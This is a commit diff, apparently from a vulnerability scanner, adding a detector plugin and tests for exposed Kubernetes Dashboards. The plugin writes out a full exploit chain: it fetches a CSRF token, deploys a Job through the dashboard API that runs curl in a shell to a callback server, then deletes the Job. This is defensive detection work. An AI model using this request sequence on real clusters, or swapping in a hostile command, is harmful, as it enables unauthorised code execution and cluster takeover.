Merge pull request #670 from JamesFoxxx:k8s-dashboard

copybara-github · copybara-github · commit 849bf5c7f1ec · 2025-10-08T04:36:53.000-07:00
PiperOrigin-RevId: 816646357
Change-Id: Ic5718a78593f85881c1d225725db351548e2dc80
diff --git a/.gitignore b/.gitignore
@@ -4,6 +4,9 @@ gradle.properties
 .gradle
 local.properties
 out
+gradlew
+gradlew.bat
+gradle/
 
 # IntelliJ IDEA
 .idea
diff --git a/templated/templateddetector/plugins/exposedui/K8s_ExposeUI.textproto b/templated/templateddetector/plugins/exposedui/K8s_ExposeUI.textproto
@@ -0,0 +1,136 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+  type: VULN_DETECTION
+  name: "K8s_ExposeUI"
+  author: "jamesFoxxx"
+  version: "1.0"
+}
+
+finding: {
+  main_id: {
+    publisher: "GOOGLE"
+    value: "K8S_EXPOSED_UI"
+  }
+  severity: CRITICAL
+  title: "Exposed Kubernetes Dashboard"
+  description: "Kubernetes Dashboard is exposed to the internet without proper authentication, allowing remote code execution. This vulnerability can lead to unauthorized access and control over the Kubernetes cluster."
+  recommendation: "Don't Expose the Kubernetes Dashboard to the Internet. If you must expose it, ensure that proper authentication and authorization mechanisms are in place. Regularly update your Kubernetes components to mitigate known vulnerabilities."
+}
+
+config: {}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+  name: "is_kubernetes_dashboard"
+  http_request: {
+    method: GET
+    uri: "/api/v1/namespace"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: { } contains: "\"name\": \"kubernetes-dashboard\"," }
+        ]
+      }
+    }
+  }
+}
+
+actions: {
+  name: "retrieve_csrftoken"
+  http_request: {
+    method: GET
+    uri: "/api/v1/csrftoken/appdeploymentfromfile"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: {} contains: "\"token\": \"" }
+        ]
+      }
+      extract_all: {
+        patterns: [
+          {
+            from_body: {}
+            regexp: "\\\"token\\\": \\\"([a-zA-Z0-9_:-]+)\\\""
+            variable_name: "csrftoken"
+          }
+        ]
+      }
+    }
+  }
+}
+actions: {
+  name: "trigger_code_execution"
+  http_request: {
+    method: POST
+    uri: "/api/v1/appdeploymentfromfile"
+    headers: [
+      { name: "X-CSRF-TOKEN" value: "{{ csrftoken }}" },
+      { name: "Content-Type" value: "application/json" }
+    ]
+    data: '{"name":"","namespace":"default","content":"apiVersion: batch/v1\\nkind: Job\\nmetadata:\\n  name: tsunami-security-scanner-job\\n  labels:\\n    app: curl-example\\nspec:\\n  template:\\n    metadata:\\n      labels:\\n        app: curl-example\\n    spec:\\n      containers:\\n      - name: curl-container\\n        image: curlimages/curl:latest\\n        command: [\\"/bin/sh\\", \\"-c\\"]\\n        args:\\n        - |\\n          curl -s {{ T_CBS_URI }} || exit 0\\n      restartPolicy: OnFailure\\n  backoffLimit: 3\\n  completions: 1","validate":true}'
+    response: {
+      http_status: 201
+    }
+  }
+  cleanup_actions: "cleanup_job"
+}
+
+actions: {
+  name: "cleanup_job"
+  http_request: {
+    method: DELETE
+    uri: "/api/v1/_raw/job/namespace/default/name/tsunami-security-scanner-job"
+    response: {
+      http_status: 200
+    }
+  }
+}
+actions: {
+  name: "initial_cleanup_job"
+  http_request: {
+    method: DELETE
+    uri: "/api/v1/_raw/job/namespace/default/name/tsunami-security-scanner-job"
+  }
+}
+actions: {
+  name: "sleep"
+  utility: { sleep: { duration_ms: 10000 } }
+}
+actions: {
+  name: "sleep_for_job_delete"
+  utility: { sleep: { duration_ms: 2000 } }
+}
+
+actions: {
+  name: "check_callback_server_logs"
+  callback_server: { action_type: CHECK }
+}
+
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+  condition: REQUIRES_CALLBACK_SERVER
+  actions: [
+    "is_kubernetes_dashboard",
+    "initial_cleanup_job",
+    "sleep_for_job_delete",
+    "retrieve_csrftoken",
+    "trigger_code_execution",
+    "sleep",
+    "check_callback_server_logs"
+  ]
+}
diff --git a/templated/templateddetector/plugins/exposedui/K8s_ExposeUI_test.textproto b/templated/templateddetector/plugins/exposedui/K8s_ExposeUI_test.textproto
@@ -0,0 +1,93 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+  tested_plugin: "K8s_ExposeUI"
+}
+
+tests: {
+  name: "whenVulnerable_returnsTrue"
+  expect_vulnerability: true
+
+  mock_callback_server: {
+    enabled: true
+    has_interaction: true
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/api/v1/namespace"
+        status: 200
+        body_content: "\"name\": \"kubernetes-dashboard\","
+      },
+      {
+        uri: "/api/v1/csrftoken/appdeploymentfromfile"
+        status: 200
+        body_content: "\"token\": \"TIM-HcANnZ3XwpXVB9D745jtuYo:1753310053154\""
+      },
+      {
+        uri: "/api/v1/appdeploymentfromfile"
+        status: 201
+        condition: {
+          headers: [
+            { name: "X-CSRF-TOKEN" value: "TIM-HcANnZ3XwpXVB9D745jtuYo:1753310053154" },
+            { name: "Content-Type" value: "application/json" }
+          ]
+          body_content:[
+            '{"name":"","namespace":"default","content":"apiVersion: batch/v1\\nkind: Job\\nmetadata:\\n  name: tsunami-security-scanner-job\\n  labels:\\n    app: curl-example\\nspec:\\n  template:\\n    metadata:\\n      labels:\\n        app: curl-example\\n    spec:\\n      containers:\\n      - name: curl-container\\n        image: curlimages/curl:latest\\n        command: [\\"/bin/sh\\", \\"-c\\"]\\n'
+          ]
+        }
+      },
+      {
+        uri: "/api/v1/_raw/job/namespace/default/name/tsunami-security-scanner-job"
+        status: 200
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNoCallback_returnsFalse"
+  expect_vulnerability: false
+
+  mock_callback_server: {
+    enabled: true
+    has_interaction: false
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/"
+        status: 200
+        body_content: "<title>Kubernetes Dashboard</title>"
+      },
+      {
+        uri: "/api/v1/appdeploymentfromfile"
+        status: 200
+        body_content: "\"token\": \"TIM-HcANnZ3XwpXVB9D745jtuYo:1753310053154\""
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotK8s_returnsFalse"
+  expect_vulnerability: false
+
+  mock_callback_server: {
+    enabled: true
+    has_interaction: true
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "TSUNAMI_MAGIC_ANY_URI"
+        status: 200
+        body_content: "Hello world"
+      }
+    ]
+  }
+}
